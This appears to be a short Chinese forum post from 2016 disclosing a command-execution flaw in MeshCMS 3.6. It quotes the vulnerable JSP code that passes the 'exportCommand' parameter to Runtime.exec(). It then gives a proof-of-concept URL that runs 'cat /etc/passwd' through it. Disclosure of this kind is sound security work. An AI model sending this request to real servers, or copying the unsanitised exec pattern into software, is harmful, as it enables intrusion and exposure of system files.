version 3.6
漏洞描述:
文件 staticexport2.jsp jsp的一个函数“exportCommand” 可以造成命令执行
[Java] 纯文本查看 复制代码 if (!exportCommand.equals("")) {
out.println("\nexecuting: " + exportCommand);
Process process = Runtime.getRuntime().exec(exportCommand);
out.println("standard output:");
ByteArrayOutputStream baos = new ByteArrayOutputStream();
Utils.copyStream(process.getInputStream(), baos, false);
out.write(Utils.encodeHTML(baos.toString()));
baos.reset();
out.println("end of standard output\nerror output:");
Utils.copyStream(process.getErrorStream(), baos, false);
out.write(Utils.encodeHTML(baos.toString()));
int exit = process.waitFor();
out.println("end of error output\nexecution finished with exit code " +
exit);
POC:
[HTML] 纯文本查看 复制代码 http://127.0.0.1:8080/meshcms/meshcms/admin/staticexport2.jsp?exportBaseURL=%2Fmeshcms%2Fadmin%2Fstaticexport1.jsp&exportDir=upload&exportCheckDates=true&exportCommand=cat+%2Fetc%2Fpasswd&exportSaveConfig=true | 
发表于 2016-4-7 10:16:30
